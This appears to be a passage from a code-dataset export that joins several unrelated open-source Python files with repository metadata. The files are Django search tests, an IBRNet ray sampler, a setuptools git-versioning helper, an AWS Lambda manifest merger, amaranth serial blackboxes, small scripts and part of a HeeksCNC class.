_el.CodeSearch.delete_a_gist(gist.id)
def test_change_files(self):
skip_test()
gist = self._gist()
_el.CodeSearch.index_a_gist(gist.id)
res = _el.CodeSearch.search_a_phrase('description', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 1
gist.update(description='desc',
gist_names=['file1', 'file2'],
gist_contents=['document', 'document'])
_el.CodeSearch.index_a_gist(gist.id)
res = _el.CodeSearch.search_a_phrase('description', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 0
res = _el.CodeSearch.search_a_phrase('file2', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 1
gist.update(description='desc',
gist_names=['f1'],
gist_contents=['text'])
_el.CodeSearch.index_a_gist(gist.id)
res = _el.CodeSearch.search_a_phrase('text', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 1
res = _el.CodeSearch.search_a_phrase('file2', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 0
_el.CodeSearch.delete_a_gist(gist.id)
class TestIssue(TestCase):
def setUp(self):
super(TestIssue, self).setUp()
_index.IndexEngine.c.delete()
def _prj(self, proj_name):
prj = CodeDoubanProject.add(proj_name, 'owner', create_trac=False)
return prj
def test_single_project(self):
skip_test()
p = self._prj("test")
iss1 = ProjectIssue.add(title='title1', description='desc1',
creator='owner', project=p.id)
IssueSearch.index_a_project_issue(p)
res = IssueSearch.search_a_phrase('owner', p.id)
res = SearchEngine.decode(res, ('issue_id',))
res = [id for id, in res]
assert len(res) == 1
assert res[0] == iss1.id
iss2 = ProjectIssue.add(title='title2', description='desc2',
creator='owner', project=p.id)
IssueSearch.index_a_project_issue(p)
res = IssueSearch.search_a_phrase('owner', p.id)
res = SearchEngine.decode(res, ('issue_id',))
res = [id for id, in res]
assert len(res) == 2
assert iss1.id in res
assert iss2.id in res
def test_multiple_project(self):
skip_test()
p1 = self._prj("test_1")
p2 = self._prj("test_2")
iss1 = ProjectIssue.add(title='title1', description='desc1',
creator='owner', project=p1.id)
iss2 = ProjectIssue.add(title='title1', description='desc1',
creator='owner', project=p2.id)
IssueSearch.index_a_project_issue(p1)
IssueSearch.index_a_project_issue(p2)
res = IssueSearch.search_a_phrase('title1', p1.id)
res = SearchEngine.decode(res, ('issue_id',))
res = [id for id, in res]
assert len(res) == 1
assert res[0] == iss1.id
res = IssueSearch.search_a_phrase('title1', p2.id)
res = SearchEngine.decode(res, ('issue_id',))
res = [id for id, in res]
assert len(res) == 1
assert res[0] == iss2.id
class TestPullRequest(TestCase):
def setUp(self):
super(TestPullRequest, self).setUp()
_index.IndexEngine.c.delete()
def _prj(self, proj_name, owner_id, fork_from=None):
prj = CodeDoubanProject.add(proj_name, owner_id, create_trac=False,
fork_from=fork_from)
return prj
def _add(self, prj, u, fn, content):
prj.git.commit_one_file(fn, content, 'add %s' % fn, u)
def test_single_project(self):
skip_test()
u_to = User("admin")
u_from = User("testuser")
to_proj = self._prj("test", "admin")
self._add(to_proj, u_to, "README.md", "hi")
from_proj = self._prj("testuser/test", "testuser", to_proj.id)
self._add(from_proj, u_from, "README.md", "hello")
pullreq = PullRequest.open(from_proj, "master", to_proj, "master")
ticket = Ticket(None, None, to_proj.id, "title", "desc", "testuser",
None, None)
pullreq = add_pull(ticket, pullreq, u_from)
ticket = pullreq.ticket
PullRequestSearch.index_a_project_pr(to_proj)
res = PullRequestSearch.search_a_phrase('title', to_proj.id)
res = SearchEngine.decode(res, ('to_proj_id',))
res = [id for id, in res]
assert len(res) == 1
class TestProjectIssuePR(TestCase):
def setUp(self):
super(TestProjectIssuePR, self).setUp()
_index.IndexEngine.c.delete()
def _prj(self, proj_name, owner_id, fork_from=None):
prj = CodeDoubanProject.add(proj_name, owner_id, create_trac=False,
fork_from=fork_from)
return prj
def _add(self, prj, u, fn, content):
prj.git.commit_one_file(fn, content, 'add %s' % fn, u)
def test_single_project(self):
skip_test()
u_to = User("admin")
u_from = User("testuser")
to_proj = self._prj("test", "admin")
self._add(to_proj, u_to, "README.md", "hi")
from_proj = self._prj("testuser/test", "testuser", to_proj.id)
self._add(from_proj, u_from, "README.md", "hello")
pullreq = PullRequest.open(from_proj, "master", to_proj, "master")
ticket = Ticket(None, None, to_proj.id, "title", "desc", "testuser",
None, None)
pullreq = add_pull(ticket, pullreq, u_from)
iss = ProjectIssue.add(title='title1', description='desc1',
creator='owner', project=to_proj.id)
IssuePRSearch.index_a_project(to_proj)
res = IssueSearch.search_a_phrase('title1', to_proj.id)
res = SearchEngine.decode(res, ('issue_id',))
res = [id for id, in res]
assert len(res) == 1
assert res[0] == iss.id
res = PullRequestSearch.search_a_phrase('title', to_proj.id)
res = SearchEngine.decode(res, ('issue_id',))
res = [id for id, in res]
assert len(res) == 1
class TestSrcSearch(TestCase):
def setUp(self):
super(TestSrcSearch, self).setUp()
_srcsearch.IndexEngine.c.delete()
_srcsearch.IndexEngine.c.put('')
_srcsearch.SrcSearch.update_mapping()
def _prj(self):
delete_project('test')
prj = CodeDoubanProject.add('test', 'owner', create_trac=False)
return prj
def _add(self, prj, fn, content):
u = self.addUser()
prj.git.commit_one_file(fn, content, 'add %s' % fn, u)
def test_get_src_indexes_from_project(self):
p = self._prj()
self._add(p, 'index.rst', base_index_rst)
self._add(p, 'yaml.conf', base_yaml_conf)
self._add(p, 'src/source1.py', src_source1_py)
self._add(p, 'src/source2.c', src_source2_c)
indexes = _srcsearch.SrcSearch.get_src_indexes_from_project(p)
assert len(indexes) == 4
indexes_values = [v for k, v in indexes]
names = [data['name'] for data in indexes_values]
for name in ['index.rst', 'yaml.conf', 'src/source1.py',
'src/source2.c']:
assert name in names
index_obj_ids = [(k, v['id']) for k, v in indexes]
for index_id, obj_id in index_obj_ids:
assert str(p.id) + obj_id == index_id
name_data_dict = {data['name']: data for data in indexes_values}
assert name_data_dict['src/source1.py']['language'] == 'Python'
assert name_data_dict['src/source2.c']['language'] == 'C'
assert name_data_dict['yaml.conf']['language'] == 'Text'
assert name_data_dict['index.rst']['language'] == 'Text'
for data in indexes_values:
assert data['project'] == p.name
def test_single_project_index(self):
skip_test()
p = self._prj()
self._add(p, 'index.rst', base_index_rst)
self._add(p, 'yaml.conf', base_yaml_conf)
self._add(p, 'src/source1.py', src_source1_py)
_srcsearch.SrcSearch.index_a_project(p)
ids = _srcsearch.SrcSearch.query_a_project_objs(p.name, fields=('id',))
assert len(ids) == 3
self._add(p, 'src/source2.c', src_source2_c)
_srcsearch.SrcSearch.update_a_project_index(p)
ids = _srcsearch.SrcSearch.query_a_project_objs(p.name, fields=('id',))
assert len(ids) == 4
_srcsearch.SrcSearch.delete_a_project_index(p)
ids = _srcsearch.SrcSearch.query_a_project_objs(p.name, fields=('id',))
assert len(ids) == 0
class TestRepoSearch(TestCase):
def setUp(self):
super(TestRepoSearch, self).setUp()
_reposearch.IndexEngine.c.delete()
def test_multiple_project_index(self):
skip_test()
for i in range(5):
CodeDoubanProject.add('test%s' % i, 'owner', create_trac=False)
_reposearch.RepoSearch.index_repos()
objs = _reposearch.RepoSearch.query_repo_objs()
assert len(objs) == 5
class TestUserSearch(TestCase):
def setUp(self):
super(TestUserSearch, self).setUp()
_usersearch.IndexEngine.c.delete()
def test_multiple_project_index(self):
skip_test()
for i in range(5):
CodeDoubanProject.add(
'test%s' % i, 'owner%s' % i, create_trac=False)
_usersearch.UserSearch.index_users()
objs = _usersearch.UserSearch.query_user_objs()
assert len(objs) == 5
| 35.816568
| 79
| 0.63346
|
b3b1e5a5a97551a97e88acd956f19d04b673ba51
| 6,075
|
py
|
Python
|
ibrnet/sample_ray.py
|
QiuhongAnnaWei/IBRNet
|
6c8b68e6d95eae04535ff0906387ec7899f5d5ce
|
[
"Apache-2.0"
] | 254
|
2021-02-26T09:08:03.000Z
|
2022-03-27T05:09:26.000Z
|
ibrnet/sample_ray.py
|
QiuhongAnnaWei/IBRNet
|
6c8b68e6d95eae04535ff0906387ec7899f5d5ce
|
[
"Apache-2.0"
] | 10
|
2021-05-18T15:12:33.000Z
|
2022-03-22T01:53:47.000Z
|
ibrnet/sample_ray.py
|
QiuhongAnnaWei/IBRNet
|
6c8b68e6d95eae04535ff0906387ec7899f5d5ce
|
[
"Apache-2.0"
] | 35
|
2021-04-13T14:37:14.000Z
|
2022-03-13T23:06:59.000Z
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import torch
import torch.nn.functional as F
rng = np.random.RandomState(234)
########################################################################################################################
# ray batch sampling
########################################################################################################################
def parse_camera(params):
H = params[:, 0]
W = params[:, 1]
intrinsics = params[:, 2:18].reshape((-1, 4, 4))
c2w = params[:, 18:34].reshape((-1, 4, 4))
return W, H, intrinsics, c2w
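# A hypothetical helper (not part of IBRNet) illustrating the 34-float layout that
# parse_camera() expects per camera: [H, W, 16 intrinsic entries, 16 c2w entries],
# with both 4x4 matrices flattened row-major. Call it manually to check the layout.
def example_pack_and_parse(H=480, W=640):
    size = torch.tensor([float(H), float(W)])
    params = torch.cat([size, torch.eye(4).reshape(-1), torch.eye(4).reshape(-1)])
    params = params.unsqueeze(0)  # shape (1, 34): a single camera
    W_out, H_out, intrinsics, c2w = parse_camera(params)
    assert intrinsics.shape == (1, 4, 4) and c2w.shape == (1, 4, 4)
    return W_out, H_out, intrinsics, c2w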
def dilate_img(img, kernel_size=20):
import cv2
assert img.dtype == np.uint8
kernel = np.ones((kernel_size, kernel_size), np.uint8)
dilation = cv2.dilate(img / 255, kernel, iterations=1) * 255
return dilation
class RaySamplerSingleImage(object):
def __init__(self, data, device, resize_factor=1, render_stride=1):
super().__init__()
self.render_stride = render_stride
self.rgb = data['rgb'] if 'rgb' in data.keys() else None
self.camera = data['camera']
self.rgb_path = data['rgb_path']
self.depth_range = data['depth_range']
self.device = device
W, H, self.intrinsics, self.c2w_mat = parse_camera(self.camera)
self.batch_size = len(self.camera)
self.H = int(H[0])
self.W = int(W[0])
# half-resolution output
if resize_factor != 1:
self.W = int(self.W * resize_factor)
self.H = int(self.H * resize_factor)
self.intrinsics[:, :2, :3] *= resize_factor
if self.rgb is not None:
self.rgb = F.interpolate(self.rgb.permute(0, 3, 1, 2), scale_factor=resize_factor).permute(0, 2, 3, 1)
self.rays_o, self.rays_d = self.get_rays_single_image(self.H, self.W, self.intrinsics, self.c2w_mat)
if self.rgb is not None:
self.rgb = self.rgb.reshape(-1, 3)
if 'src_rgbs' in data.keys():
self.src_rgbs = data['src_rgbs']
else:
self.src_rgbs = None
if 'src_cameras' in data.keys():
self.src_cameras = data['src_cameras']
else:
self.src_cameras = None
def get_rays_single_image(self, H, W, intrinsics, c2w):
'''
:param H: image height
:param W: image width
:param intrinsics: 4 by 4 intrinsic matrix
:param c2w: 4 by 4 camera to world extrinsic matrix
:return:
'''
u, v = np.meshgrid(np.arange(W)[::self.render_stride], np.arange(H)[::self.render_stride])
u = u.reshape(-1).astype(dtype=np.float32) # + 0.5 # add half pixel
v = v.reshape(-1).astype(dtype=np.float32) # + 0.5
pixels = np.stack((u, v, np.ones_like(u)), axis=0) # (3, H*W)
pixels = torch.from_numpy(pixels)
batched_pixels = pixels.unsqueeze(0).repeat(self.batch_size, 1, 1)
rays_d = (c2w[:, :3, :3].bmm(torch.inverse(intrinsics[:, :3, :3])).bmm(batched_pixels)).transpose(1, 2)
rays_d = rays_d.reshape(-1, 3)
rays_o = c2w[:, :3, 3].unsqueeze(1).repeat(1, rays_d.shape[0], 1).reshape(-1, 3) # B x HW x 3
return rays_o, rays_d
def get_all(self):
ret = {'ray_o': self.rays_o.cuda(),
'ray_d': self.rays_d.cuda(),
'depth_range': self.depth_range.cuda(),
'camera': self.camera.cuda(),
'rgb': self.rgb.cuda() if self.rgb is not None else None,
'src_rgbs': self.src_rgbs.cuda() if self.src_rgbs is not None else None,
'src_cameras': self.src_cameras.cuda() if self.src_cameras is not None else None,
}
return ret
def sample_random_pixel(self, N_rand, sample_mode, center_ratio=0.8):
if sample_mode == 'center':
border_H = int(self.H * (1 - center_ratio) / 2.)
border_W = int(self.W * (1 - center_ratio) / 2.)
# pixel coordinates
u, v = np.meshgrid(np.arange(border_H, self.H - border_H),
np.arange(border_W, self.W - border_W))
u = u.reshape(-1)
v = v.reshape(-1)
select_inds = rng.choice(u.shape[0], size=(N_rand,), replace=False)
select_inds = v[select_inds] + self.W * u[select_inds]
elif sample_mode == 'uniform':
# Random from one image
select_inds = rng.choice(self.H*self.W, size=(N_rand,), replace=False)
else:
raise Exception("unknown sample mode!")
return select_inds
def random_sample(self, N_rand, sample_mode, center_ratio=0.8):
'''
        :param N_rand: number of rays to be cast
:return:
'''
select_inds = self.sample_random_pixel(N_rand, sample_mode, center_ratio)
rays_o = self.rays_o[select_inds]
rays_d = self.rays_d[select_inds]
if self.rgb is not None:
rgb = self.rgb[select_inds]
else:
rgb = None
ret = {'ray_o': rays_o.cuda(),
'ray_d': rays_d.cuda(),
'camera': self.camera.cuda(),
'depth_range': self.depth_range.cuda(),
'rgb': rgb.cuda() if rgb is not None else None,
'src_rgbs': self.src_rgbs.cuda() if self.src_rgbs is not None else None,
'src_cameras': self.src_cameras.cuda() if self.src_cameras is not None else None,
'selected_inds': select_inds
}
return ret
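# A minimal, hypothetical usage sketch: only __init__ and sample_random_pixel() are
# exercised, so no GPU is needed; the identity camera and the dummy path are made up.
def example_sampler_usage():
    H, W = 8, 8
    camera_row = torch.cat([torch.tensor([float(H), float(W)]),
                            torch.eye(4).reshape(-1), torch.eye(4).reshape(-1)])
    data = {'camera': camera_row.unsqueeze(0),       # (1, 34) camera vector
            'rgb_path': 'dummy.png',                 # stored but never opened here
            'depth_range': torch.tensor([[0.1, 1.0]])}
    sampler = RaySamplerSingleImage(data, device='cpu')
    inds = sampler.sample_random_pixel(N_rand=16, sample_mode='uniform')
    assert len(set(inds.tolist())) == 16             # distinct flat indices in [0, H*W)
    return sampler, inds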
| 38.449367
| 120
| 0.569877
|
cf13f9d2eb7378159ff347beb4da214146517d26
| 437
|
py
|
Python
|
Pacote_download/Sobre Random.py
|
devluisg1/old_projects_python
|
a1fabcf154e1c574aa89e60968321d6e7489fdf1
|
[
"MIT"
] | null | null | null |
Pacote_download/Sobre Random.py
|
devluisg1/old_projects_python
|
a1fabcf154e1c574aa89e60968321d6e7489fdf1
|
[
"MIT"
] | null | null | null |
Pacote_download/Sobre Random.py
|
devluisg1/old_projects_python
|
a1fabcf154e1c574aa89e60968321d6e7489fdf1
|
[
"MIT"
] | null | null | null |
import random
from datetime import date
lista = ['pedra', 'papel', 'tesoura']
escolha = random.choice(lista)
print(escolha)
# MY TEST HERE, THIS ISN'T REALLY ABOUT RANDOM, IT'S MORE ABOUT DATETIME
hoje = date.today().year
ano = 2003
atual = date.today().year
lista = []
for c in range(hoje, 2003, - 1):
if c % 4 == 0 and c % 100 != 0 or c % 400 == 0:
lista.append(366)
else:
lista.append(365)
print(lista)
print(sum(lista))
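# An equivalent cross-check (a sketch; it assumes the goal above is counting the days
# of each year from the current year down to 2004): calendar.isleap implements the
# same leap-year rule as the explicit condition in the loop.
import calendar
assert sum(366 if calendar.isleap(c) else 365 for c in range(hoje, 2003, -1)) == sum(lista)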
| 21.85
| 59
| 0.638444
|
cdc8abf329c7d22422d756e774d8e5c5fe6ff572
| 5,490
|
py
|
Python
|
setuptools_git_versioning.py
|
bmiklautz/setuptools-git-versioning
|
bc7e35002c26cca619c8fbdd2e62c6b065f744d8
|
[
"MIT"
] | null | null | null |
setuptools_git_versioning.py
|
bmiklautz/setuptools-git-versioning
|
bc7e35002c26cca619c8fbdd2e62c6b065f744d8
|
[
"MIT"
] | null | null | null |
setuptools_git_versioning.py
|
bmiklautz/setuptools-git-versioning
|
bc7e35002c26cca619c8fbdd2e62c6b065f744d8
|
[
"MIT"
] | null | null | null |
import os
import subprocess
from setuptools.dist import Distribution
from distutils.errors import DistutilsSetupError
from typing import List, Optional, Any, Callable
from six.moves import collections_abc
DEFAULT_TEMPLATE = "{tag}" # type: str
DEFAULT_DEV_TEMPLATE = "{tag}.dev{ccount}+git.{sha}" # type: str
DEFAULT_DIRTY_TEMPLATE = "{tag}.dev{ccount}+git.{sha}.dirty" # type: str
DEFAULT_STARTING_VERSION = '0.0.1'
def _exec(cmd): # type: (str) -> List[str]
try:
stdout = subprocess.check_output(cmd, shell=True,
universal_newlines=True)
except subprocess.CalledProcessError as e:
stdout = e.output
lines = stdout.splitlines()
return [line.rstrip() for line in lines if line.rstrip()]
def get_branches(): # type: () -> List[str]
branches = _exec("git branch -l --format '%(refname:short)'")
if branches:
return branches
return []
def get_branch(): # type: () -> Optional[str]
branches = _exec("git rev-parse --abbrev-ref HEAD")
if branches:
return branches[0]
return None
def get_all_tags(): # type: () -> List[str]
tags = _exec("git tag --sort=-version:refname")
if tags:
return tags
return []
def get_branch_tags(): # type: () -> List[str]
tags = _exec("git tag --sort=-version:refname --merged")
if tags:
return tags
return []
def get_tags(): # type: () -> List[str]
    return get_branch_tags()
def get_tag(): # type: () -> Optional[str]
tags = get_branch_tags()
if tags:
return tags[0]
return None
def get_sha(name='HEAD'): # type: (str) -> Optional[str]
sha = _exec("git rev-list -n 1 {name}".format(name=name))
if sha:
return sha[0]
return None
def get_latest_file_commit(path): # type: (str) -> Optional[str]
sha = _exec("git log -n 1 --pretty=format:%H -- {path}".format(path=path))
if sha:
return sha[0]
return None
def is_dirty(): # type: () -> bool
res = _exec("git status --short")
if res:
return True
return False
def count_since(name): # type: (str) -> Optional[int]
res = _exec("git rev-list --count HEAD ^{name}".format(name=name))
if res:
return int(res[0])
return None
def parse_config(dist, _, value): # type: (Distribution, Any, Any) -> None
if isinstance(value, bool):
if value:
version = version_from_git()
dist.metadata.version = version
return
else:
raise DistutilsSetupError("Can't be False")
if not isinstance(value, collections_abc.Mapping):
raise DistutilsSetupError("Config in the wrong format")
template = value.get('template', DEFAULT_TEMPLATE)
dev_template = value.get('dev_template', DEFAULT_DEV_TEMPLATE)
dirty_template = value.get('dirty_template', DEFAULT_DIRTY_TEMPLATE)
starting_version = value.get('starting_version', DEFAULT_STARTING_VERSION)
version_callback = value.get('version_callback', None)
version_file = value.get('version_file', None)
count_commits_from_version_file = value.get('count_commits_from_version_file', False)
version = version_from_git(
template=template,
dev_template=dev_template,
dirty_template=dirty_template,
starting_version=starting_version,
version_callback=version_callback,
version_file=version_file,
count_commits_from_version_file=count_commits_from_version_file
)
dist.metadata.version = version
def read_version_from_file(path):
with open(path, 'r') as file:
return file.read().strip()
def version_from_git(template=DEFAULT_TEMPLATE,
dev_template=DEFAULT_DEV_TEMPLATE,
dirty_template=DEFAULT_DIRTY_TEMPLATE,
starting_version=DEFAULT_STARTING_VERSION,
version_callback=None,
version_file=None,
count_commits_from_version_file=False
                     ): # type: (str, str, str, str, Optional[Any], Optional[str], bool) -> str
# Check if PKG-INFO exists and return value in that if it does
if os.path.exists('PKG-INFO'):
with open('PKG-INFO', 'r') as f:
lines = f.readlines()
for line in lines:
if line.startswith('Version:'):
return line[8:].strip()
from_file = False
tag = get_tag()
if tag is None:
if version_callback is not None:
if callable(version_callback):
return version_callback()
else:
return version_callback
if not os.path.exists(version_file):
return starting_version
else:
from_file = True
tag = read_version_from_file(version_file)
if not count_commits_from_version_file:
return tag
tag_sha = get_latest_file_commit(version_file)
else:
tag_sha = get_sha(tag)
dirty = is_dirty()
head_sha = get_sha()
short_sha = head_sha[:8] if head_sha is not None else ''
ccount = count_since(tag_sha)
on_tag = head_sha is not None and head_sha == tag_sha and not from_file
branch = get_branch()
if dirty:
t = dirty_template
elif not on_tag and ccount is not None:
t = dev_template
else:
t = template
return t.format(sha=short_sha, tag=tag, ccount=ccount, branch=branch)
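# A small illustrative sketch (not part of the library's behaviour) of how the three
# default templates above are filled in; the tag, commit count and sha are made up.
if __name__ == "__main__":
    example = {"tag": "1.2.3", "ccount": 4, "sha": "abc12345", "branch": "master"}
    print(DEFAULT_TEMPLATE.format(**example))        # 1.2.3  (exactly on a tag)
    print(DEFAULT_DEV_TEMPLATE.format(**example))    # 1.2.3.dev4+git.abc12345
    print(DEFAULT_DIRTY_TEMPLATE.format(**example))  # 1.2.3.dev4+git.abc12345.dirty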
| 30
| 106
| 0.628051
|
2e64e4e2be15524004187158d11414174fcc389d
| 918
|
py
|
Python
|
manage.py
|
dalmarcogd/test_django_elasticsearch
|
9c97857a7f225a87554637fcae405e8c1a03d0f7
|
[
"Apache-2.0"
] | null | null | null |
manage.py
|
dalmarcogd/test_django_elasticsearch
|
9c97857a7f225a87554637fcae405e8c1a03d0f7
|
[
"Apache-2.0"
] | 13
|
2020-06-05T18:26:43.000Z
|
2021-06-10T20:36:13.000Z
|
backend/server_beta/manage.py
|
dalmarcogd/challenge_ms
|
761f0a588b4c309cf6e226d306df3609c1179b4c
|
[
"MIT"
] | 1
|
2019-04-07T23:42:22.000Z
|
2019-04-07T23:42:22.000Z
|
#!/usr/bin/env python
import os
import sys
try:
import googleclouddebugger
googleclouddebugger.AttachDebugger()
except ImportError:
pass
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "server_beta_project.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| 31.655172
| 83
| 0.665577
|
91fa9f4ec0e69143231ab78cf116e6d4c795db62
| 1,677
|
py
|
Python
|
source/lambda/active_learning_1p/Output/export_partial.py
|
awslabs/sagemaker-av-visual-perception
|
9956c08bc775b012f1d8c768cc79d8366b5c87f0
|
[
"Apache-2.0"
] | 1
|
2021-10-20T15:30:08.000Z
|
2021-10-20T15:30:08.000Z
|
source/lambda/active_learning_1p/Output/export_partial.py
|
awslabs/sagemaker-av-visual-perception
|
9956c08bc775b012f1d8c768cc79d8366b5c87f0
|
[
"Apache-2.0"
] | null | null | null |
source/lambda/active_learning_1p/Output/export_partial.py
|
awslabs/sagemaker-av-visual-perception
|
9956c08bc775b012f1d8c768cc79d8366b5c87f0
|
[
"Apache-2.0"
] | null | null | null |
import json
from collections import OrderedDict
from s3_helper import S3Ref, download_stringio, upload
import logging
from io import StringIO
logger = logging.getLogger()
logger.setLevel(logging.INFO)
def merge_manifests(full_input, partial_output):
"""
    This method merges the partial output manifest into the full input manifest
    to create the complete manifest.
"""
complete_manifest = OrderedDict()
for line in full_input:
data = json.loads(line)
complete_manifest[data["id"]] = data
logger.info("Loaded input manifest of size {} to memory.".format(
len(complete_manifest)))
for line in partial_output:
data = json.loads(line)
complete_manifest[data["id"]] = data
logger.info("Updated partial output in memory.")
return complete_manifest
def lambda_handler(event, context):
"""
    This function merges partial outputs into the manifest.
    The result is uploaded to S3.
"""
s3_input_uri = event['ManifestS3Uri']
source = S3Ref.from_uri(s3_input_uri)
full_input = download_stringio(source)
s3_output_uri = event['OutputS3Uri']
output = S3Ref.from_uri(s3_output_uri)
partial_output = download_stringio(output)
logger.info("Downloaded input and output manifests {}, {}".format(
s3_input_uri, s3_output_uri))
complete_manifest = merge_manifests(full_input, partial_output)
    # Write the complete manifest back to the S3 bucket
merged = StringIO()
for line in complete_manifest.values():
merged.write(json.dumps(line) + "\n")
upload(merged, source)
logger.info("Uploaded merged file to {}".format(source.get_uri()))
| 32.25
| 80
| 0.709004
|
a9f22fcc82b215eb3a7bce2ac3e14ddd29c5a6e6
| 3,073
|
py
|
Python
|
lambdasoc/sim/blackboxes/serial/wrapper.py
|
shrine-maiden-heavy-industries/lambdasoc
|
c81f27e47eec20e46344ce32dfb2590eb2721c83
|
[
"BSD-2-Clause"
] | null | null | null |
lambdasoc/sim/blackboxes/serial/wrapper.py
|
shrine-maiden-heavy-industries/lambdasoc
|
c81f27e47eec20e46344ce32dfb2590eb2721c83
|
[
"BSD-2-Clause"
] | null | null | null |
lambdasoc/sim/blackboxes/serial/wrapper.py
|
shrine-maiden-heavy-industries/lambdasoc
|
c81f27e47eec20e46344ce32dfb2590eb2721c83
|
[
"BSD-2-Clause"
] | null | null | null |
from amaranth import *
from amaranth.utils import bits_for
__all__ = ["AsyncSerialRX_Blackbox", "AsyncSerialTX_Blackbox", "AsyncSerial_Blackbox"]
class AsyncSerialRX_Blackbox(Elaboratable):
def __init__(self, *, divisor, divisor_bits=None, data_bits=8, parity="none", parent=None):
if parent is not None and not isinstance(parent, AsyncSerial_Blackbox):
raise TypeError("Parent must be an instance of AsyncSerial_Blackbox, not {!r}"
.format(parent))
self.parent = parent
self.divisor = Signal(divisor_bits or bits_for(divisor))
self.data = Signal(data_bits)
self.err = Record([
("overflow", 1),
("frame", 1),
("parity", 1),
])
self.rdy = Signal()
self.ack = Signal()
def elaborate(self, platform):
return Instance("serial_rx",
p_ID = hex(id(self.parent) if self.parent else id(self)),
p_DATA_BITS = len(self.data),
i_clk = ClockSignal("sync"),
o_data = self.data,
o_err_overflow = self.err.overflow,
o_err_frame = self.err.frame,
o_err_parity = self.err.parity,
o_rdy = self.rdy,
i_ack = self.ack,
)
class AsyncSerialTX_Blackbox(Elaboratable):
def __init__(self, *, divisor, divisor_bits=None, data_bits=8, parity="none", parent=None):
if parent is not None and not isinstance(parent, AsyncSerial_Blackbox):
raise TypeError("Parent must be an instance of AsyncSerial_Blackbox, not {!r}"
.format(parent))
self._parent = parent
self.divisor = Signal(divisor_bits or bits_for(divisor))
self.data = Signal(data_bits)
self.rdy = Signal()
self.ack = Signal()
def elaborate(self, platform):
return Instance("serial_tx",
p_ID = hex(id(self._parent) if self._parent else id(self)),
p_DATA_BITS = len(self.data),
i_clk = ClockSignal("sync"),
i_data = self.data,
o_rdy = self.rdy,
i_ack = self.ack,
)
class AsyncSerial_Blackbox(Elaboratable):
def __init__(self, *, divisor, divisor_bits=None, **kwargs):
self.divisor = Signal(divisor_bits or bits_for(divisor), reset=divisor)
self.rx = AsyncSerialRX_Blackbox(
divisor = divisor,
divisor_bits = divisor_bits,
parent = self,
**kwargs
)
self.tx = AsyncSerialTX_Blackbox(
divisor = divisor,
divisor_bits = divisor_bits,
parent = self,
**kwargs
)
def elaborate(self, platform):
m = Module()
m.submodules.rx = self.rx
m.submodules.tx = self.tx
m.d.comb += [
self.rx.divisor.eq(self.divisor),
self.tx.divisor.eq(self.divisor),
]
return m
| 34.144444
| 95
| 0.556459
|
e1e3a89e5a3f358c5099625ceda51c9d2088ee23
| 768
|
py
|
Python
|
Linearmodel-Python.py
|
atompa/Python_regrex1_script
|
b04647dc7187062e93022c118199d24fa1809871
|
[
"Apache-2.0"
] | null | null | null |
Linearmodel-Python.py
|
atompa/Python_regrex1_script
|
b04647dc7187062e93022c118199d24fa1809871
|
[
"Apache-2.0"
] | null | null | null |
Linearmodel-Python.py
|
atompa/Python_regrex1_script
|
b04647dc7187062e93022c118199d24fa1809871
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
import pandas as pd
import sys
df = pd.read_csv(sys.argv[1])
print(df)
import matplotlib.pyplot as plt
x = df.x
y = df.y
plt.scatter(x, y)
plt.title('Regrex Data')
plt.xlabel('x')
plt.ylabel('y')
# Save before plt.show(), otherwise a blank figure is written to disk.
plt.savefig('Scatterplot_Python.png')
plt.show()
import numpy as np
from sklearn.linear_model import LinearRegression
X = df.x.to_numpy()
X = X.reshape(-1, 1)
y = df.y.to_numpy()
y = y.reshape(-1,1)
reg = LinearRegression().fit(X, y)
reg.score(X, y)
reg.coef_
reg.intercept_
y_predict = reg.predict(X)
plt.scatter(x, y)
plt.plot(X, y_predict)
plt.title('Regrex Data')
plt.xlabel('x')
plt.ylabel('y')
# Save before plt.show() so the fitted line is captured in the file.
plt.savefig('Linearplot_Python.png')
plt.show()
plt.scatter(x, y, color='black')
plt.show()
| 9.721519
| 49
| 0.669271
|
999f90772d6153629012e207830cc57bdfc43e16
| 2,254
|
py
|
Python
|
pycnc/Operation.py
|
BbiKkuMi/heekscnc
|
7a5dbea079f176c5dbc1e7f83313ff43f8fe5084
|
[
"BSD-3-Clause"
] | 107
|
2015-01-13T20:42:11.000Z
|
2022-02-12T22:20:50.000Z
|
pycnc/Operation.py
|
BbiKkuMi/heekscnc
|
7a5dbea079f176c5dbc1e7f83313ff43f8fe5084
|
[
"BSD-3-Clause"
] | 31
|
2015-10-03T07:30:54.000Z
|
2021-02-09T22:06:28.000Z
|
pycnc/Operation.py
|
BbiKkuMi/heekscnc
|
7a5dbea079f176c5dbc1e7f83313ff43f8fe5084
|
[
"BSD-3-Clause"
] | 55
|
2015-02-17T00:41:47.000Z
|
2022-02-14T11:26:46.000Z
|
from Object import Object
from consts import *
import HeeksCNC
from CNCConfig import CNCConfig
class Operation(Object):
def __init__(self):
Object.__init__(self)
self.active = True
self.comment = ''
self.title = self.TypeName()
self.tool_number = 0
def TypeName(self):
return "Operation"
def icon(self):
# the name of the PNG file in the HeeksCNC icons folder
if self.active:
return self.op_icon()
else:
return "noentry"
def CanBeDeleted(self):
return True
def UsesTool(self): # some operations don't use the tool number
return True
def ReadDefaultValues(self):
config = CNCConfig()
self.tool_number = config.ReadInt("OpTool", 0)
if self.tool_number != 0:
default_tool = HeeksCNC.program.tools.FindTool(self.tool_number)
            if default_tool is None:
